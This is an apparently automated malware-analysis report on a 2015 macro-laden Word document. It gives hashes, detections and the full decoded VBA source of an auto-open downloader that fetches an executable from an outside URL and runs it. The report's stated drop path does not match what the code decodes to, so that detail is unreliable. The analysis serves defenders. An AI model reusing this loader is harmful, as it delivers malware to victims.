Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 901652283bd26716…

MALICIOUS

Office (OLE)

50.5 KB Created: 2015-01-19 10:28:00 Authoring application: Microsoft Office Word First seen: 2015-02-05
MD5: 6001ed1e009de1a5f9021b613da7de60 SHA-1: 5b6fba5e57237e06f1a7f86ffce0965ba7197e37 SHA-256: 901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1071.001 Web Protocols T1204.002 Malicious File

The sample is a malicious Office document containing an obfuscated VBA auto-exec loader. The autoopen macro calls a function that decodes a URL and a filename, then uses CreateObject to download a file from 'http://stylishseychlelles.com/js/bin.exe' to the path 'C:\Users\Public\TEMA.exe' using the Environ function to get the user's temporary directory. This indicates the document is designed to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2920 bytes
SHA-256: 4f3799fcc5649f2aab4fdcead194b625e8fb85be57347856418b72231f771b32
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
Private Const u4UPbupdHqn = "VEVNUA=="
Private Const JGYEERm = "aHR0cDovL3N0eWxpc2hzZXljaGVsbGVzLmNvbS9qcy9iaW4uZXhl"
Private Const WbqiAH = DYAVRU2O7CQK
Private Const aXpVWjFOR = u4UPbupdHqn
Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
Private Const s1tNlT1AWf = ""
Private Const FTKZS = "R0VU"
Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
Private Const LZKV = ""
Private Const JLR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

Sub iwpHOuE6r()
 nJFIm
End Sub
Sub eODC7ApCVQ()
     iwpHOuE6r
End Sub
Sub autoopen()
     iwpHOuE6r
End Sub
Function JyXsorj(ByVal sdfwefwef As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim hUIGGYdfg As Object, i As Long, GYUbjsdf As Long, hjjjjjb() As Byte
     

    Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
    hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
    hUIGGYdfg.Send

hjjjjjb = hUIGGYdfg.responseBody

    GYUbjsdf = FreeFile
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
    Put #GYUbjsdf, , hjjjjjb
    Close #GYUbjsdf

    Set hUIGGYdfg = Nothing

Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
    End Function
Sub nJFIm()
FFewr43 = NsCj(JGYEERm)
     JyXsorj FFewr43, Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)

End Sub
Public Function NsCj(strInput As String) As String

On Error Resume Next
On Local Error Resume Next
Dim arrChars64() As Byte
Dim arrChars64Rev() As Byte
Dim arrInput() As Byte
Dim arrOutput() As Byte
Dim arrChar(4) As Integer
Dim intLen As Long
Dim intDelta As Long
Dim i As Long
Dim j As Long
Const Base64 = JLR
arrChars64() = StrConv(Base64, vbFromUnicode)
ReDim arrChars64Rev(255)
For i = 0 To UBound(arrChars64)
arrChars64Rev(arrChars64(i)) = i
Next i
intLen = Len(strInput)
If intLen = 0 Then Exit Function
intDelta = intLen Mod 4
If intDelta > 0 Then
strInput = strInput + String$(4 - intDelta, 0)
intLen = Len(strInput)
End If
arrInput() = StrConv(strInput, vbFromUnicode)
ReDim arrOutput(((intLen + 1) / 4) * 3)
For i = 0 To UBound(arrInput) Step 4
arrChar(1) = arrChars64Rev(arrInput(i))
arrChar(2) = arrChars64Rev(arrInput(i + 1))
arrChar(3) = arrChars64Rev(arrInput(i + 2))
arrChar(4) = arrChars64Rev(arrInput(i + 3))
arrOutput(j) = ((arrChar(1) * 4 + Int(arrChar(2) / 16)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(2) * 16 + Int(arrChar(3) / 4)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(3) * 64 + arrChar(4)) And 255)
j = j + 1
Next
 NsCj = Replace(StrConv(arrOutput, vbUnicode), vbNullChar, "")
End Function